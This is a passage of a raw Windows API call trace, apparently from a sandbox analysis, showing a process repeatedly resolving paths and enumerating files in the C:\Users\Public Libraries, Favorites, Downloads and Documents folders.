nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.116] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.117] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.117] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.117] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.117] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.117] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.117] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.117] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.117] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.117] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.117] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.117] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c)) returned 1 [0250.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.118] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), fInfoLevelId=0x0, lpFileInformation=0x6e99df4 | out: lpFileInformation=0x6e99df4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c)) returned 1 [0250.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.118] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.118] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.118] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c)) returned 1 [0250.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.118] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpFilePart=0x0) returned 0x2f [0250.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.122] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Favorites", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Favorites", lpFilePart=0x0) returned 0x19 [0250.122] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Favorites\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Favorites\\", lpFilePart=0x0) returned 0x1a [0250.122] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0250.122] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.123] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0250.123] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.123] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Favorites", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Favorites", lpFilePart=0x0) returned 0x19 [0250.123] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Favorites\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Favorites\\", lpFilePart=0x0) returned 0x1a [0250.123] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0250.123] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.124] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0250.124] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.124] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads", lpFilePart=0x0) returned 0x19 [0250.124] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads\\", lpFilePart=0x0) returned 0x1a [0250.124] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0250.124] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.125] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.125] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0250.125] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.125] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads", lpFilePart=0x0) returned 0x19 [0250.125] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads\\", lpFilePart=0x0) returned 0x1a [0250.125] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0250.125] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.126] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.126] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.126] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.126] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads\\desktop.ini", lpFilePart=0x0) returned 0x25 [0250.126] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads\\desktop.ini", lpFilePart=0x0) returned 0x25 [0250.126] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Downloads\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Downloads\\desktop.ini", lpFilePart=0x0) returned 0x25 [0250.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.126] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents", lpFilePart=0x0) returned 0x19 [0250.126] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x0) returned 0x1a [0250.126] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0250.127] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.127] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.127] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0250.138] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0250.138] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0250.138] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.138] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.139] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents", lpFilePart=0x0) returned 0x19 [0250.139] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x105, 